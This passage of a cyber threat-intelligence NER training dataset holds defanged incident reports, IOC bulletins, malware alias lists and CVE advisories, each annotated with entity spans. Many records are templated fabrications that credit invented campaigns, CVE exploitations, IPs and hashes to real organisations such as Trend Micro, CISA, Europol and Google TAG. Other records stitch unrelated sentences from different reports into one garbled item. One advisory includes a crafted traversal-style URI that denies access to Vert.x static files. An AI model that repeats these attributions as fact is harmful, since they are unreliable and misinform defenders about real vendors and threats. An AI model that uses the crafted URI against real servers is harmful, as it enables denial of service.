hxxp://cdn-login.tech/callback": [[587, 621]], "Indicator: 10.143.117.212": [[634, 654]], "Indicator: 663254acc13c6c7e14596ef3875b4dd07c6d16d7": [[687, 727]]}, "info": {"id": "synth_v2_01113", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 24[.]204[.]130[.]46, the INTERPOL IR team identified QakBot running as /home/user/.config/beacon.dll. The threat actor, believed to be Aqua Blizzard, used Impacket for credential harvesting and Certutil for lateral movement. Exfiltrated data was sent to secure-portal[ . ]link and backuplogin[.]net. The initial dropper (SHA1: e18ca283e50fd7dd3d3b395a86e8c03b980bc62b) was delivered via a phishing email from noreply@auth-check[.]org. A second C2 node was observed at 172 [ . ] 45 [ . ] 10 [ . ] 219, with a persistence mechanism writing to C:\\Program Files\\Common Files\\agent.py.", "spans": {"Indicator: 24.204.130.46": [[64, 83]], "Organization: INTERPOL": [[89, 97]], "Malware: QakBot": [[117, 123]], "Indicator: secure-portal.link": [[318, 340]], "Indicator: backuplogin.net": [[345, 362]], "Indicator: e18ca283e50fd7dd3d3b395a86e8c03b980bc62b": [[391, 431]], "Indicator: noreply@auth-check.org": [[473, 497]], "Indicator: 172.45.10.219": [[532, 563]]}, "info": {"id": "synth_v2_00269", "source": "defanged_augment"}}
{"text": "The most widely infected major Android versions are KitKat with 50 percent , followed by Jelly Bean with 40 percent . If the DoublePulsar backdoor does not exist , then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit . APT33 : 64[.]251[.]19[.]231 [REDACTED][ . ]ddns[ . ]net . Adversaries may manipulate control systems devices or possibly leverage their own , to communicate with and command physical control processes .", "spans": {"System: Android": [[31, 38]], "System: KitKat": [[52, 58]], "System: Jelly Bean": [[89, 99]], "Vulnerability: Eternalblue SMBv1 exploit": [[226, 251]], "Indicator: 64.251.19.231": [[262, 281]], "Indicator: [REDACTED].ddns.net": [[282, 309]]}, "info": {"id": "cyberner_stix_train_002573", "source": "defanged_augment"}}
{"text": "Canarytokens is an open source tool which helps track activity and actions on your network. A Cross-Site Scripting vulnerability was identified in the history page of triggered Canarytokens. This permits an attacker who recognised an HTTP-based Canarytoken (a URL) to execute Javascript in the Canarytoken's history page (domain: canarytokens[ . ]org) when the history page is later visited by the Canarytoken's creator. This vulnerability could be used to disable or delete the affected Canarytoken, or view its activation history. It might also be used as a stepping stone towards revealing more information about the Canarytoken's creator to the attacker. For example, an attacker could recover the email address tied to the Canarytoken, or place Javascript on the history page that redirect the creator towards an attacker-controlled Canarytoken to show the creator's network location. An attacker could only act on the discovered Canarytoken. This issue did not expose other Canarytokens or other Canarytoken creators. The issue has been patched on Canarytokens[ . ]org and in the latest release. No signs of successful exploitation of this vulnerability have been found. Users are advised to upgrade. There are no known workarounds for this issue.", "spans": {"Indicator: canarytokens.org": [[330, 350]], "Indicator: Canarytokens.org": [[1054, 1074]], "Vulnerability: Cross-Site Scripting": [[94, 114]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-31113"}}
{"text": "Once launched , null will first verify whether it is able to fork on the system and that there is no other instance of itself currently running by checking whether the local port number 6842 is available . It has conducted attacks on similar organizations in Saudi Arabia , likely because of the access that those organizations have . Daily_Report[ . ]docx : The Winnti group diversified its targets to include enterprises such as those in pharmaceutics and telecommunications .", "spans": {"Indicator: Daily_Report.docx": [[335, 356]], "Organization: enterprises": [[411, 422]], "Organization: pharmaceutics": [[440, 453]], "Organization: telecommunications": [[458, 476]]}, "info": {"id": "cyberner_stix_train_004458", "source": "defanged_augment"}}
{"text": "Blog Post by Trend Micro: Tracking Charming Kitten's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2024-27546 against Ivanti Connect Secure deployments. The initial access vector involves spear-phishing emails from billing@mail-service[.]info delivering Lumma Stealer. Post-compromise, the attackers deploy IcedID and use Mimikatz for reconnaissance. C2 infrastructure includes 145[.]45[.]185[.]197 and datasync[.]top. A staging server at hxxp://portalmail[ . ]net/wp-content/uploads/doc.php hosts additional tooling. Key artifact: /usr/local/bin/update.dll (MD5: 74c2735811bcfaee412e6e4287e94239).", "spans": {"Organization: Trend Micro": [[13, 24]], "Vulnerability: CVE-2024-27546": [[130, 144]], "System: Ivanti Connect Secure": [[153, 174]], "Indicator: billing@mail-service.info": [[250, 277]], "Malware: Lumma Stealer": [[289, 302]], "Malware: IcedID": [[342, 348]], "Indicator: 145.45.185.197": [[413, 433]], "Indicator: datasync.top": [[438, 452]], "Indicator: hxxp://portalmail.net/wp-content/uploads/doc.php": [[474, 526]], "Indicator: 74c2735811bcfaee412e6e4287e94239": [[599, 631]]}, "info": {"id": "synth_v2_01677", "source": "defanged_augment"}}
{"text": "Figure 5 – Keylogger component Figure 6 shows one of the most noteworthy functions of Anubis : its ransomware module . Based on the profile of the victims and the type of information targeted by the attackers , Symantec believes that Butterfly is financially motivated , stealing information it can potentially profit from . FIN7 S-APT/GRIFFON : hpservice-cdn[ . ]com realtek-cdn[ . ]com logitech-cdn[.]com pci-cdn[ . ]com appleservice-cdn[ . ]com servicebing-cdn[ . ]com . On June 22 , @AnFam17 spotted the same fake browser update leveraging URL shortcuts .", "spans": {"Malware: Anubis": [[86, 92]], "Organization: Symantec": [[211, 219]], "Malware: FIN7 S-APT/GRIFFON": [[325, 343]], "Indicator: hpservice-cdn.com": [[346, 367]], "Indicator: realtek-cdn.com": [[368, 387]], "Indicator: logitech-cdn.com": [[388, 406]], "Indicator: pci-cdn.com": [[407, 422]], "Indicator: appleservice-cdn.com": [[423, 447]], "Indicator: servicebing-cdn.com": [[448, 471]], "Organization: @AnFam17": [[487, 495]]}, "info": {"id": "cyberner_stix_train_003311", "source": "defanged_augment"}}
{"text": "A backdoor also known as: W32.DeadBeef.Worm Worm/W32.AutoRun.175104 Worm.Win32.AutoRun!O Worm.AutoRun.Win32.8121 W32/AutoRun.pv W32.SillyFDC Win32/Wainlas.A WORM_AUTORUN_000002c.TOMA Win.Worm.Autorun-1414 Worm.Win32.AutoRun.pv Trojan.Win32.AutoRun.ltul Win32.Worm.Autorun.Tbim Worm.Win32.AutoRun.~MAA Win32.HLLW.Autoruner.748 WORM_AUTORUN_000002c.TOMA Worm/AutoRun.bhu TR/Drop.AutoRun.BM Worm/Win32.AutoRun Worm.Win32.Autorun.12728 Worm.Win32.AutoRun.pv Worm/Win32.AutoRun.R16694 Worm.AutoRun Worm.Win32.AutoRun W32/AutoRun.NTQ!worm Trj/Debat.A Trojan[ . ]PSW[ . ]Win32[ . ]QQPass[ . ]CF", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Trojan.PSW.Win32.QQPass.CF": [[545, 587]]}, "info": {"id": "cyner2_train_002068", "source": "defanged_augment"}}
{"text": "Symantec published a threat intelligence report linking APT29 to a new campaign exploiting CVE-2022-40108 in SonicWall SMA. The attackers deployed Latrodectus via BITSAdmin, establishing C2 communication with 13[.]176[.]195[.]202 and portalsecure[.]link. A secondary payload was downloaded from hxxp://datadata[ . ]info/gate.php. The malware binary (SHA256: 166d51ec8b6262b278b7a6e1347a8a4ec40242344b44da1cf87ab1c11d566a63) was dropped to C:\\Program Files\\Common Files\\ntds.dit. Phishing emails were sent from confirm@urgent-notice[.]online targeting enterprise users. A backup C2 server was identified at 179 [ . ] 213 [ . ] 209 [ . ] 39.", "spans": {"Organization: Symantec": [[0, 8]], "Vulnerability: CVE-2022-40108": [[91, 105]], "System: SonicWall SMA": [[109, 122]], "Malware: Latrodectus": [[147, 158]], "Indicator: 13.176.195.202": [[209, 229]], "Indicator: portalsecure.link": [[234, 253]], "Indicator: hxxp://datadata.info/gate.php": [[295, 328]], "Indicator: 166d51ec8b6262b278b7a6e1347a8a4ec40242344b44da1cf87ab1c11d566a63": [[358, 422]], "Indicator: confirm@urgent-notice.online": [[510, 540]], "Indicator: 179.213.209.39": [[606, 638]]}, "info": {"id": "synth_v2_00078", "source": "defanged_augment"}}
{"text": "Uploading any incoming SMS messages ( including the balance inquiry results ) to the remote C2 server . BlackOasis in recent months sent a wave of phishing emails . The second one is the setting of the persistence mechanism through the writing of the vbs code in the Startup folder with name “ templates[ . ]vbs ” . When Bradshaw refused to sell the domain , he and his then - girlfriend were subject to an unrelenting campaign of online harassment and blackmail .", "spans": {"Indicator: templates.vbs": [[294, 311]], "Organization: Bradshaw": [[321, 329]], "Organization: he and his then - girlfriend": [[359, 387]]}, "info": {"id": "cyberner_stix_train_006544", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Zscaler ThreatLabz identified a large-scale phishing operation. Emails originated from confirm@mail-service[ . ]info and billing@login-portal[.]tech, spoofing legitimate services. Victims were directed to hxxp://cloud-data[ . ]top/secure/token which hosted a credential harvesting page on static-sync[ . ]tech. A secondary link hxxp://node-portal[.]net/download/update.exe delivered FormBook (MD5: 410cdd0ebbbe8086c372d4033dcca27d). The malware was saved to /opt/app/bin/payload.bin and established C2 with 172[.]95[.]204[.]77.", "spans": {"Organization: Zscaler ThreatLabz": [[26, 44]], "Indicator: confirm@mail-service.info": [[113, 142]], "Indicator: billing@login-portal.tech": [[147, 174]], "Indicator: hxxp://cloud-data.top/secure/token": [[231, 269]], "Indicator: static-sync.tech": [[315, 335]], "Indicator: hxxp://node-portal.net/download/update.exe": [[354, 398]], "Malware: FormBook": [[409, 417]], "Indicator: 410cdd0ebbbe8086c372d4033dcca27d": [[424, 456]], "Indicator: 172.95.204.77": [[533, 552]]}, "info": {"id": "synth_v2_01041", "source": "defanged_augment"}}
{"text": "CISA detected a multi-stage attack chain. The initial phishing email from security@identity-verify[ . ]cc contained a link to hxxps://dataedge[.]xyz/api/v2/auth. This redirected to hxxps://edgemail[ . ]online/callback on backup-backup[.]site. A secondary email from info@credential-check[ . ]site pointed to hxxps://gatewayupdate[ . ]io/admin/config which delivered WarmCookie. The final payload callback was hxxps://apinode[ . ]top/admin/config resolving to 172 [ . ] 193 [ . ] 17 [ . ] 238 via edge-node[.]link.", "spans": {"Organization: CISA": [[0, 4]], "Indicator: security@identity-verify.cc": [[74, 105]], "Indicator: hxxps://dataedge.xyz/api/v2/auth": [[126, 160]], "Indicator: hxxps://edgemail.online/callback": [[181, 217]], "Indicator: backup-backup.site": [[221, 241]], "Indicator: info@credential-check.site": [[266, 296]], "Indicator: hxxps://gatewayupdate.io/admin/config": [[308, 349]], "Malware: WarmCookie": [[366, 376]], "Indicator: hxxps://apinode.top/admin/config": [[409, 445]], "Indicator: 172.193.17.238": [[459, 491]], "Indicator: edge-node.link": [[496, 512]]}, "info": {"id": "synth_v2_01725", "source": "defanged_augment"}}
{"text": "Europol published a threat intelligence report linking Volt Typhoon to a new campaign exploiting CVE-2021-37696 in Ivanti Connect Secure. The attackers deployed Meduza Stealer via Ligolo, establishing C2 communication with 217[.]234[.]88[.]209 and data-backup[.]net. A secondary payload was downloaded from hxxp://mail-login[ . ]io/callback. The malware binary (SHA1: 36ac1f70c33bf6477c22d4076969fc664ef0b6db) was dropped to C:\\Windows\\System32\\shell.php. Phishing emails were sent from service@identity-verify[ . ]cc targeting enterprise users. A backup C2 server was identified at 158[.]43[.]68[.]81.", "spans": {"Organization: Europol": [[0, 7]], "Vulnerability: CVE-2021-37696": [[97, 111]], "System: Ivanti Connect Secure": [[115, 136]], "Malware: Meduza Stealer": [[161, 175]], "Indicator: 217.234.88.209": [[223, 243]], "Indicator: data-backup.net": [[248, 265]], "Indicator: http://mail-login.io/callback": [[307, 340]], "Indicator: 36ac1f70c33bf6477c22d4076969fc664ef0b6db": [[368, 408]], "Indicator: service@identity-verify.cc": [[487, 517]], "Indicator: 158.43.68.81": [[583, 601]]}, "info": {"id": "synth_v2_00094", "source": "defanged_augment"}}
{"text": "Artifact Analysis for Hive campaign:\nStage 1 dropper at /usr/local/bin/lsass.dmp - SHA256: 1bcb0a6eed1c296651a768bb74cc64d005c762063547ff12704940f80d60384f\nStage 2 loader at C:\\Users\\Public\\Documents\\agent.py - SHA256: 665e5f2d382cea6d7f9da97bb0d4d87569a997beaee37f85e1ac143aea71c46a\nFinal payload at /tmp/loader.exe - MD5: fceb7b43f0db4102ab6a7afcb092763c\nExfiltration module - SHA1: 8fa3b6f7705cbdcd5780d42a8039942081baad88\nAll stages communicated with 172 [ . ] 254 [ . ] 153 [ . ] 182. Covenant signatures detected in Stage 2.", "spans": {"Malware: Hive": [[22, 26]], "Indicator: 1bcb0a6eed1c296651a768bb74cc64d005c762063547ff12704940f80d60384f": [[91, 155]], "Indicator: 665e5f2d382cea6d7f9da97bb0d4d87569a997beaee37f85e1ac143aea71c46a": [[219, 283]], "Indicator: fceb7b43f0db4102ab6a7afcb092763c": [[324, 356]], "Indicator: 8fa3b6f7705cbdcd5780d42a8039942081baad88": [[385, 425]], "Indicator: 172.254.153.182": [[455, 488]]}, "info": {"id": "synth_v2_01989", "source": "defanged_augment"}}
{"text": "TG-3390 : 208[.]115[.]242[.]36 .", "spans": {"Indicator: 208.115.242.36": [[10, 30]]}, "info": {"id": "cyberner_stix_train_007691", "source": "defanged_augment"}}
{"text": "IOC Bulletin - AgentTesla Campaign:\nNetwork Indicators:\n- 10 [ . ] 6 [ . ] 70 [ . ] 98\n- 172 [ . ] 225 [ . ] 84 [ . ] 18\n- 50 [ . ] 128 [ . ] 197 [ . ] 245\n- storagecloud[.]live\n- apimail[.]dev\nURLs:\n- hxxp://auth-update[.]tech/login\n- hxxp://api-edge[ . ]online/login\nEmail Senders:\n- notification@auth-check[.]org\n- support@credential-check[ . ]site\nFile Indicators:\n- MD5: 55bf2caa24753bb78545a256d07f7df6\n- MD5: 823c55e38fb689af79d69524ac7a97e2\n- Drop path: /tmp/helper.sh", "spans": {"Malware: AgentTesla": [[15, 25]], "Indicator: 10.6.70.98": [[58, 86]], "Indicator: 172.225.84.18": [[89, 120]], "Indicator: 50.128.197.245": [[123, 155]], "Indicator: storagecloud.live": [[158, 177]], "Indicator: apimail.dev": [[180, 193]], "Indicator: hxxp://auth-update.tech/login": [[202, 233]], "Indicator: hxxp://api-edge.online/login": [[236, 268]], "Indicator: notification@auth-check.org": [[286, 315]], "Indicator: support@credential-check.site": [[318, 351]], "Indicator: 55bf2caa24753bb78545a256d07f7df6": [[376, 408]], "Indicator: 823c55e38fb689af79d69524ac7a97e2": [[416, 448]]}, "info": {"id": "synth_v2_01408", "source": "defanged_augment"}}
{"text": "Google TAG published a threat intelligence report linking Forest Blizzard to a new campaign exploiting CVE-2026-10752 in Progress Telerik. The attackers deployed Cobalt Strike via ADFind, establishing C2 communication with 192 [ . ] 154 [ . ] 178 [ . ] 108 and static-mail[.]live. A secondary payload was downloaded from hxxps://relay-cloud[ . ]info/wp-content/uploads/doc.php. The malware binary (SHA256: bac29a9b6aeefd90b4e10c373953c04504252cfd57f3d6b883630053b3e6b62a) was dropped to C:\\Windows\\System32\\beacon.dll. Phishing emails were sent from verify@account-update[.]xyz targeting enterprise users. A backup C2 server was identified at 192 [ . ] 120 [ . ] 98 [ . ] 31.", "spans": {"Organization: Google TAG": [[0, 10]], "Vulnerability: CVE-2026-10752": [[103, 117]], "System: Progress Telerik": [[121, 137]], "Malware: Cobalt Strike": [[162, 175]], "Indicator: 192.154.178.108": [[223, 256]], "Indicator: static-mail.live": [[261, 279]], "Indicator: hxxps://relay-cloud.info/wp-content/uploads/doc.php": [[321, 376]], "Indicator: bac29a9b6aeefd90b4e10c373953c04504252cfd57f3d6b883630053b3e6b62a": [[406, 470]], "Indicator: verify@account-update.xyz": [[550, 577]], "Indicator: 192.120.98.31": [[643, 674]]}, "info": {"id": "synth_v2_00226", "source": "defanged_augment"}}
{"text": "Dvmap : the first Android malware with code injection 08 JUN 2017 In April 2017 we started observing new rooting malware being distributed through the Google Play Store . Hackers first actively spread bots using the Niteris exploit , and then search for infected devices at banks amongst their bots by analyzing IP addresses , cracked passwords and results of the modules performance . The attached file , Reserva Advogados Associados[ . ]docx ( Attorneys Associates Reservation[.]docx ) , is a malicious Word file that drops a remote OLE object via template injection to execute macro code . Though few details are currently available about CVE-2023 - 37450 , Apple indicated it had been exploited in the wild and could be triggered by a vulnerable browser processing specially crafted web content .", "spans": {"Malware: Dvmap": [[0, 5]], "System: Android": [[18, 25]], "System: Google Play Store": [[151, 168]], "Vulnerability: Niteris exploit": [[216, 231]], "Organization: banks": [[274, 279]], "Indicator: Reserva Advogados Associados.docx": [[406, 443]], "Indicator: Attorneys Associates Reservation.docx": [[446, 485]], "Vulnerability: CVE-2023 - 37450": [[642, 658]]}, "info": {"id": "cyberner_stix_train_005343", "source": "defanged_augment"}}
{"text": "Vetta Loader is a persistent Loader spreading with infected USB drives. It downloads other components leveraging legit hosting services.\r\nhxxps://yoroi[.]company/wp-content/uploads/2023/12/202311-Vetta-Loader_Def-min.pdf", "spans": {"Indicator: https://yoroi.company/wp-content/uploads/2023/12/202311-Vetta-Loader_Def-min.pdf": [[138, 220]], "Malware: Vetta Loader": [[0, 12]]}, "info": {"source": "defanged_augment", "name": "Vetta Loader"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Fix mlx5e_priv_init() cleanup flow\n\nWhen mlx5e_priv_init() fails, the cleanup flow calls mlx5e_selq_cleanup which\ncalls mlx5e_selq_apply() that assures that the `priv->state_lock` is held using\nlockdep_is_held().\n\nAcquire the state_lock in mlx5e_selq_cleanup().\n\nKernel log:\n=============================\nWARNING: suspicious RCU usage\n6.8.0-rc3_net_next_841a9b5 #1 Not tainted\n-----------------------------\ndrivers/net/ethernet/mellanox/mlx5/core/en/selq.c:124 suspicious rcu_dereference_protected() usage!\n\nother info that might help us debug this:\n\nrcu_scheduler_active = 2, debug_locks = 1\n2 locks held by systemd-modules/293:\n #0: ffffffffa05067b0 (devices_rwsem){++++}-{3:3}, at: ib_register_client+0x109/0x1b0 [ib_core]\n #1: ffff8881096c65c0 (&device->client_data_rwsem){++++}-{3:3}, at: add_client_context+0x104/0x1c0 [ib_core]\n\nstack backtrace:\nCPU: 4 PID: 293 Comm: systemd-modules Not tainted 6.8.0-rc3_net_next_841a9b5 #1\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1[ . ]13[ . ]0-0-gf21b5a4aeb02-prebuilt[ . ]qemu[ . ]org 04/01/2014\nCall Trace:\n <TASK>\n dump_stack_lvl+0x8a/0xa0\n lockdep_rcu_suspicious+0x154/0x1a0\n mlx5e_selq_apply+0x94/0xa0 [mlx5_core]\n mlx5e_selq_cleanup+0x3a/0x60 [mlx5_core]\n mlx5e_priv_init+0x2be/0x2f0 [mlx5_core]\n mlx5_rdma_setup_rn+0x7c/0x1a0 [mlx5_core]\n rdma_init_netdev+0x4e/0x80 [ib_core]\n ? mlx5_rdma_netdev_free+0x70/0x70 [mlx5_core]\n ipoib_intf_init+0x64/0x550 [ib_ipoib]\n ipoib_intf_alloc+0x4e/0xc0 [ib_ipoib]\n ipoib_add_one+0xb0/0x360 [ib_ipoib]\n add_client_context+0x112/0x1c0 [ib_core]\n ib_register_client+0x166/0x1b0 [ib_core]\n ? 0xffffffffa0573000\n ipoib_init_module+0xeb/0x1a0 [ib_ipoib]\n do_one_initcall+0x61/0x250\n do_init_module+0x8a/0x270\n init_module_from_file+0x8b/0xd0\n idempotent_init_module+0x17d/0x230\n __x64_sys_finit_module+0x61/0xb0\n do_syscall_64+0x71/0x140\n entry_SYSCALL_64_after_hwframe+0x46/0x4e\n </TASK>", "spans": {"Indicator: rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org": [[1070, 1130]], "System: Linux kernel": [[7, 19]], "System: systemd": [[689, 696], [955, 962]], "System: QEMU": [[1028, 1032]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-35959"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Brute Ratel artifacts at C:\\Users\\Public\\Documents\\lsass.dmp. Memory dump analysis confirmed execution of Havoc. Registry modifications pointed to persistence via C:\\Users\\admin\\AppData\\Local\\Temp\\payload.bin. Network forensics identified connections to 10 [ . ] 27 [ . ] 109 [ . ] 215 and securebackup[ . ]info. Email headers traced the initial vector to it@identity-verify[.]cc. File C:\\Windows\\System32\\sam.hive (SHA1: f847f0475fed82c2a5d009f8a085124923436d4e) was identified as the initial dropper. A staging URL hxxps://api-auth[.]org/wp-content/uploads/doc.php resolved to 173[.]90[.]251[.]18. Secondary artifact hash: MD5: e07534afaa11fd0762aa8a8602f99fc2.", "spans": {"Indicator: 10.27.109.215": [[326, 357]], "Indicator: securebackup.info": [[362, 383]], "Indicator: it@identity-verify.cc": [[428, 451]], "Indicator: f847f0475fed82c2a5d009f8a085124923436d4e": [[494, 534]], "Indicator: hxxps://api-auth.org/wp-content/uploads/doc.php": [[589, 638]], "Indicator: 173.90.251.18": [[651, 670]], "Indicator: e07534afaa11fd0762aa8a8602f99fc2": [[702, 734]]}, "info": {"id": "synth_v2_01284", "source": "defanged_augment"}}
{"text": "The threat actors appear to have leveraged publicly available exploit code that can be found on Github at the URL : hxxps://github[.]com/rxwx/CVE-2017-8570 . For example , we have observed frequent reuse of older ( patched ) exploits in malware operations against the Tibetan community .", "spans": {"Organization: Tibetan community": [[268, 285]], "Indicator: https://github.com/rxwx/CVE-2017-8570": [[116, 155]]}, "info": {"id": "cyberner_stix_train_007260", "source": "defanged_augment"}}
{"text": "Chisel is an open-source project by Jaime Pillora (jpillora) that allows tunneling TCP and UDP connections via HTTP. It is available across platforms and written in Go. While benign in itself, Chisel has been utilized by multiple threat actors. It was for example observed by SentinelOne during a PYSA ransomware campaign to achieve persistence and used as backdoor.\r\nGithub: hxxps://github[.]com/jpillora/chisel", "spans": {"Indicator: https://github.com/jpillora/chisel": [[376, 412]], "System: Go": [[165, 167]], "Organization: SentinelOne": [[276, 287]]}, "info": {"source": "defanged_augment", "name": "Chisel"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Seatbelt artifacts at /usr/local/bin/update.dll. Memory dump analysis confirmed execution of LaZagne. Registry modifications pointed to persistence via /usr/local/bin/payload.bin. Network forensics identified connections to 19[.]40[.]80[.]96 and node-cdn[.]online. Email headers traced the initial vector to info@document-share[ . ]link. File C:\\Windows\\System32\\agent.py (MD5: 2fc8739d4c5ab2b5afcec4540af3074f) was identified as the initial dropper. A staging URL hxxps://data-mail[ . ]dev/secure/token resolved to 220 [ . ] 44 [ . ] 67 [ . ] 83. Secondary artifact hash: MD5: cfb71a80eb61496f0b8dcb2e661fabd9.", "spans": {"Indicator: 19.40.80.96": [[296, 313]], "Indicator: node-cdn.online": [[318, 335]], "Indicator: info@document-share.link": [[380, 408]], "Indicator: 2fc8739d4c5ab2b5afcec4540af3074f": [[450, 482]], "Indicator: hxxps://data-mail.dev/secure/token": [[537, 575]], "Indicator: 220.44.67.83": [[588, 618]], "Indicator: cfb71a80eb61496f0b8dcb2e661fabd9": [[650, 682]]}, "info": {"id": "synth_v2_01215", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Worm/W32.DipNet.139264 W32/DipNet.f Trojan.Win32.DipNet.emkm W32/Dipnet.F Trojan.Netdepix.B Win32/Dipnet.NAD Net-Worm.Win32.DipNet.f Worm.DipNet!vTuZ7jF3dLw Worm.Win32.DipNet.139264[h] W32.W.DipNet.f!c Virus.Win32.Part.a Worm.Win32.Dipnet.NAD BackDoor.Xdoor.351 Worm.DipNet.Win32.8 BehavesLike[ . ]Win32[ . ]Trojan[ . ]ch W32/Dipnet.XULH-0302 Worm/DipNet.a WORM/DipNet.b W32/Netdepix.B!worm Worm[Net]/Win32.DipNet Win32/Dipnet.worm.139264 Worm:Win32/DipNet.H Win32/Oddbob.E Net-Worm.DipNet W32/Oddbob.E.worm Backdoor.Win32.Xdoor Worm/Dipnet.M Worm.Win32.DipNet.aMVE", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Trojan.ch": [[308, 347]]}, "info": {"id": "cyner2_train_001439", "source": "defanged_augment"}}
{"text": "Trend Micro published a threat intelligence report linking OilRig to a new campaign exploiting CVE-2024-19363 in Cisco ASA. The attackers deployed TrickBot via Merlin, establishing C2 communication with 10[.]124[.]52[.]179 and mailapi[.]io. A secondary payload was downloaded from hxxp://updategateway[ . ]live/api/v2/auth. The malware binary (MD5: 07249a544d17e701e0372ed140c27327) was dropped to /etc/cron.d/sam.hive. Phishing emails were sent from noreply@identity-verify[ . ]cc targeting enterprise users. A backup C2 server was identified at 218 [ . ] 61 [ . ] 21 [ . ] 89.", "spans": {"Organization: Trend Micro": [[0, 11]], "Vulnerability: CVE-2024-19363": [[95, 109]], "System: Cisco ASA": [[113, 122]], "Malware: TrickBot": [[147, 155]], "Indicator: 10.124.52.179": [[203, 222]], "Indicator: mailapi.io": [[227, 239]], "Indicator: http://updategateway.live/api/v2/auth": [[281, 322]], "Indicator: 07249a544d17e701e0372ed140c27327": [[349, 381]], "Indicator: noreply@identity-verify.cc": [[451, 481]], "Indicator: 218.61.21.89": [[547, 577]]}, "info": {"id": "synth_v2_00018", "source": "defanged_augment"}}
{"text": "Microsoft MSRC published a threat intelligence report linking Star Blizzard to a new campaign exploiting CVE-2025-45322 in Cisco ASA. The attackers deployed Dridex via Metasploit, establishing C2 communication with 192 [ . ] 86 [ . ] 33 [ . ] 94 and gateway-proxy[ . ]info. A secondary payload was downloaded from hxxp://portalmail[.]online/gate.php. The malware binary (SHA1: f41c15beab8bb6c53694a6b74a6693a860692dee) was dropped to /usr/local/bin/payload.bin. Phishing emails were sent from updates@secure-verify[.]net targeting enterprise users. A backup C2 server was identified at 172 [ . ] 102 [ . ] 206 [ . ] 32.", "spans": {"Organization: Microsoft MSRC": [[0, 14]], "Vulnerability: CVE-2025-45322": [[105, 119]], "System: Cisco ASA": [[123, 132]], "Malware: Dridex": [[157, 163]], "Indicator: 192.86.33.94": [[215, 245]], "Indicator: gateway-proxy.info": [[250, 272]], "Indicator: http://portalmail.online/gate.php": [[314, 349]], "Indicator: f41c15beab8bb6c53694a6b74a6693a860692dee": [[377, 417]], "Indicator: updates@secure-verify.net": [[493, 520]], "Indicator: 172.102.206.32": [[586, 618]]}, "info": {"id": "synth_v2_00248", "source": "defanged_augment"}}
{"text": "IOC Bulletin - Latrodectus Campaign:\nNetwork Indicators:\n- 10[.]205[.]20[.]236\n- 192 [ . ] 251 [ . ] 22 [ . ] 10\n- 39[.]64[.]41[.]136\n- mailrelay[ . ]dev\n- cachegateway[.]tech\nURLs:\n- hxxps://storage-login[.]online/assets/js/payload.js\n- hxxp://mail-static[ . ]cc/api/v2/auth\nEmail Senders:\n- alert@mail-service[.]info\n- billing@auth-check[ . ]org\nFile Indicators:\n- SHA1: c071fbae3550fb7e50e7d112a7f0d450f3ae2ad5\n- SHA1: fefcc6e631c1ef450715220f048b04f50993f717\n- Drop path: /tmp/update.dll", "spans": {"Malware: Latrodectus": [[15, 26]], "Indicator: 10.205.20.236": [[59, 78]], "Indicator: 192.251.22.10": [[81, 112]], "Indicator: 39.64.41.136": [[115, 133]], "Indicator: mailrelay.dev": [[136, 153]], "Indicator: cachegateway.tech": [[156, 175]], "Indicator: hxxps://storage-login.online/assets/js/payload.js": [[184, 235]], "Indicator: http://mail-static.cc/api/v2/auth": [[238, 275]], "Indicator: alert@mail-service.info": [[293, 318]], "Indicator: billing@auth-check.org": [[321, 347]], "Indicator: c071fbae3550fb7e50e7d112a7f0d450f3ae2ad5": [[373, 413]], "Indicator: fefcc6e631c1ef450715220f048b04f50993f717": [[422, 462]]}, "info": {"id": "synth_v2_01366", "source": "defanged_augment"}}
{"text": "The Vert.x Web static handler component cache can be manipulated to deny the access to static files served by the handler using specifically crafted request URI.\n\n\nThe issue comes from an improper implementation of the C. rule of section 5.2.4 of RFC3986 and is fixed in Vert.x Core component (used by Vert.x Web):  hxxps://github[.]com/eclipse-vertx/vert.x/pull/5895 \n\n\n\nSteps to reproduce\nGiven a file served by the static handler, craft an URI that introduces a string like bar%2F..%2F after the last / char to deny the access to the URI with an HTTP 404 response. For example hxxps://example[.]com/foo/index.html can be denied with hxxps://example[ . ]com/foo/bar%2F..%2Findex.html\n\nMitgation\nDisabling Static Handler cache fixes the issue.\n\n\n\nStaticHandler staticHandler = StaticHandler.create().setCachingEnabled(false);", "spans": {"Indicator: https://github.com/eclipse-vertx/vert.x/pull/5895": [[316, 367]], "Indicator: https://example.com/foo/index.html": [[580, 616]], "Indicator: https://example.com/foo/bar%2F..%2Findex.html": [[636, 685]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2026-1002"}}
{"text": "JuiceLedger is a threat actor known for infostealing through their JuiceStealer .NET assembly. They have evolved from spreading fraudulent applications to conducting supply chain attacks, targeting PyPI contributors with phishing campaigns and typosquatting. Their malicious packages contain a code snippet that downloads and executes JuiceStealer, which has evolved to support additional browsers and Discord. Victims of JuiceLedger attacks are advised to reset passwords and report any suspicious activity to security@pypi[ . ]org.", "spans": {"Indicator: security@pypi.org": [[511, 532]], "System: .NET": [[80, 84]], "System: Discord": [[402, 409]], "Vulnerability: phishing": [[221, 229]]}, "info": {"source": "defanged_augment", "name": "JuiceLedger"}}
